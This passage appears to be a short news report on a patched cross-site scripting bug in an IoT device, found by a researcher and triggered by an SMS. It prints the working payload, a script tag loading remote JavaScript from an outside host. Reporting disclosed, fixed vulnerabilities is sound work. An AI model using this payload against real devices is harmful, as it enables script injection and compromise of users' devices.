The vulnerability was an Cross Site Scripting (XSS) bug that can triggered by sending an SMS containing the following payload, <script src=//n.ms/a.js></script>
This is not the first time for Hörsch. Earlier also he had done intensive research on IOT devices and found multiple vulnerabilities. With his findings he had also appeared at last Kaspersky Security Analyst Submit.
Currently, firm have fixed the issue and release the patch for it. Users can download the patched firmware from the download page.